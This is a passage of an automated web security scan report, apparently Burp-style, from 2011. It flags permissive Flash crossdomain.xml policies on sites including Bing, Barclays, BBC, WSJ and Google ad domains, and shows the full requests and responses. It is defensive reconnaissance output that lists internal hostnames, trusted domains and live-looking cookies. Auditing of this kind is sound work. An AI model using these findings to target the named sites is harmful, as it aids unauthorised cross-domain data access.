SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

6.24. http://api.bing.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bing.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 634
Content-Type: text/xml
Last-Modified: Fri, 01 Oct 2010 21:58:33 GMT
ETag: A06DD1053D1686DFCEF21D90E3BAD7190000027A
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 03 May 2011 13:14:22 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-05-03T13%3a14%3a22; expires=Fri, 13-May-2011 13:14:22 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=C3C1517A18C04672849B462BAC004B13; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1754714&MS=1754714; expires=Thu, 02-May-2013 13:14:22 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=CCB8F84834AF459095A21C34AA9F833D; expires=Thu, 02-May-2013 13:14:22 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110503; expires=Thu, 02-May-2013 13:14:22 GMT; domain=.bing.com; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.bing.com" he
...[SNIP]...
<allow-access-from domain="*.bing.com"/>
...[SNIP]...
<allow-access-from domain="blstc.msn.com"/>
...[SNIP]...
<allow-access-from domain="stc.sandblu.msn-int.com"/>
...[SNIP]...

6.25. http://apps.barclays.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://apps.barclays.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: apps.barclays.co.uk

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:00 GMT
Server: Apache
Set-Cookie: ssuserid=173.193.214.243.1304418120720311; path=/; expires=Wed, 27-Apr-33 10:22:00 GMT
Last-Modified: Tue, 19 Oct 2010 11:18:27 GMT
Accept-Ranges: bytes
Content-Length: 2397
Cache-Control: max-age=3600, must-revalidate
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*.mediaplex.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cache.cantos.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.adtech.panthercustomer.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aka-cdn.adtech.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.a1767.g.akamai.net/v/1767/18689/7d/img-dc2.adtech.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.a248.e.akamai.net/v/248/18690/7d/img-dc2.adtech.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aka-cdn-ns.adtech.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.barclaysmicrosites.co.uk.lan" secure="false" />
...[SNIP]...
<allow-access-from domain="stage.clabs23.intranet.barclays.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="wa6p.wload.barclays.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.barclays.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.fantasyleague.com" secure="false" />
...[SNIP]...

6.26. https://apps.barclays.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://apps.barclays.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: apps.barclays.co.uk

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:56:22 GMT
Server: Apache
Set-Cookie: ssuserid=173.193.214.243.1304427382843002; path=/; expires=Wed, 27-Apr-33 12:56:22 GMT
Last-Modified: Tue, 19 Oct 2010 11:18:27 GMT
Accept-Ranges: bytes
Content-Length: 2397
Cache-Control: max-age=3600, must-revalidate
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*.mediaplex.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cache.cantos.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.adtech.panthercustomer.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aka-cdn.adtech.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.a1767.g.akamai.net/v/1767/18689/7d/img-dc2.adtech.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.a248.e.akamai.net/v/248/18690/7d/img-dc2.adtech.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aka-cdn-ns.adtech.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.barclaysmicrosites.co.uk.lan" secure="false" />
...[SNIP]...
<allow-access-from domain="stage.clabs23.intranet.barclays.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="wa6p.wload.barclays.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.barclays.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.fantasyleague.com" secure="false" />
...[SNIP]...

6.27. http://edge.sharethis.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://edge.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 20 Apr 2011 00:39:48 GMT
ETag: "18e1d-14a-4a14edca27d00"
Content-Type: application/xml
Date: Tue, 03 May 2011 13:21:39 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

6.28. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=19
Expires: Tue, 03 May 2011 12:27:30 GMT
Date: Tue, 03 May 2011 12:27:11 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.29. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Tue, 03 May 2011 03:57:34 GMT
Expires: Wed, 04 May 2011 03:57:34 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 34549

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.30. http://ktbcare.hi5.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ktbcare.hi5.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ktbcare.hi5.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"414-1286911046000"
Last-Modified: Tue, 12 Oct 2010 19:17:26 GMT
Content-Type: application/xml
Content-Length: 414
Date: Tue, 03 May 2011 13:24:13 GMT
Connection: keep-alive
Set-Cookie: NSC_bqq-tfswfst-ofxvj=e246bd1e3660;expires=Tue, 03-May-11 13:46:01 GMT;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.mysite.com -->
<cross-domain-policy>
<allow-access-from domain="*.hi5.com" />
<allow-access-from domain="hi5.com" />
<allow-access-from domain="x.mochiads.com" />
<allow-access-from domain="*.socialmoraygames.com"/>
...[SNIP]...

6.31. http://news.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: news.bbc.co.uk

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=10
Content-Type: text/xml
Date: Tue, 03 May 2011 13:24:15 GMT
Keep-Alive: timeout=10, max=788
Expires: Tue, 03 May 2011 13:24:25 GMT
Connection: close
Set-Cookie: BBC-UID=14ad6c50b081dfaf41926aa1515bbacec024438e50f051ca543bcaf441ac625c0; expires=Wed, 02-May-12 13:24:15 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=14ad6c50b081dfaf41926aa1515bbacec024438e50f051ca543bcaf441ac625c0; expires=Wed, 02-May-12 13:24:15 GMT; path=/; domain=bbc.co.uk;
Last-Modified: Wed, 20 Apr 2011 09:02:26 GMT
Content-Length: 1081

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.32. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=112
Expires: Tue, 03 May 2011 12:28:53 GMT
Date: Tue, 03 May 2011 12:27:01 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.33. http://online.wsj.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: online.wsj.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:24:28 GMT
Server: Apache
Last-Modified: Wed, 23 Feb 2011 22:18:09 GMT
Accept-Ranges: bytes
Content-Length: 3499
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=50
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.com"/>
    <allow-access-from domain="m.doubleclick.net"/>
    <allow-access-from domain="*.dowjonesonline.com"/>
    <allow-access-from domain="www.dowjonesonline.com"/>
    <allow-access-from domain="a.marketwatch.com"/>
    <allow-access-from domain="*.marketwatch.com"/>
    <allow-access-from domain="www.akamai.com"/>
    <allow-access-from domain="*.akamai.com"/>
    <allow-access-from domain="www.wsj.com"/>
    <allow-access-from domain="*.wsj.com"/>
    <allow-access-from domain="s.dev.wsj.com"/>
    <allow-access-from domain="idev.online.wsj.com"/>
    <allow-access-from domain="s.wsjsat.dowjones.net"/>
    <allow-access-from domain="s.s.dev.wsj.com"/>
<allow-access-from domain="reno.wsjqa.dowjones.net"/>
    <allow-access-from domain="*.online.wsj.com"/>
...[SNIP]...
<allow-access-from domain="quotes.wsj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="public.wsj.com"/>
    <allow-access-from domain="*.public.wsj.com"/>
<allow-access-from domain="www.barrons.com"/>
    <allow-access-from domain="*.barrons.com"/>
...[SNIP]...
<allow-access-from domain="idev.online.barrons.com"/>
    <allow-access-from domain="*.online.barrons.com"/>
    <allow-access-from domain="online.barrons.com"/>
    <allow-access-from domain="public.barrons.com"/>
    <allow-access-from domain="*.public.barrons.com"/>
    <allow-access-from domain="*.aol.com"/>
    <allow-access-from domain="*.brightcove.com"/>
    <allow-access-from domain="creatives.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="wsjdigital.com"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.piclens.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dowjones.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="online.s.dev.wsj.com"/>
    <allow-access-from domain="quotes.s.dev.wsj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="polls.s.dev.wsj.com"/>
<allow-access-from domain="blogs.s.dev.wsj.com"/>
<allow-access-from domain="triplewebdesign.com"/>
<allow-access-from domain="ingyournumber.com"/>
   <allow-access-from domain="*.ingyournumber.com"/>
<allow-access-from domain="*.issuu.com"/>
   <allow-access-from domain="static.issuu.com"/>
    <allow-access-from domain="professional.s.dev.wsj.com"/>
    <allow-access-from domain="*.dartmotif.com"/>
    <allow-access-from domain="wsjradio.com"/>
    <allow-access-from domain="*.wsjradio.com"/>
    <allow-access-from domain="www.wsjradio.com"/>
    <allow-access-from domain="*.eyereturn.com"/>
<allow-access-from domain="fxtrader.l.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.f.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.s.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.dowjones.com"/>
    <allow-access-from domain="dowjones.visualla.com"/>
...[SNIP]...

6.34. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Tue, 03 May 2011 01:08:03 GMT
Expires: Wed, 04 May 2011 01:08:03 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 44720

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.35. http://picasaweb.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Expires: Wed, 04 May 2011 13:23:21 GMT
Date: Tue, 03 May 2011 13:23:21 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.ru" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.co.th" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.bg" />
<allow-access-from domain="*.google.hr" />
<allow-access-from domain="*.google.cz" />
<allow-access-from domain="*.google.gr" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.hu" />
<allow-access-from domain="*.google.co.id" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.google.si" />
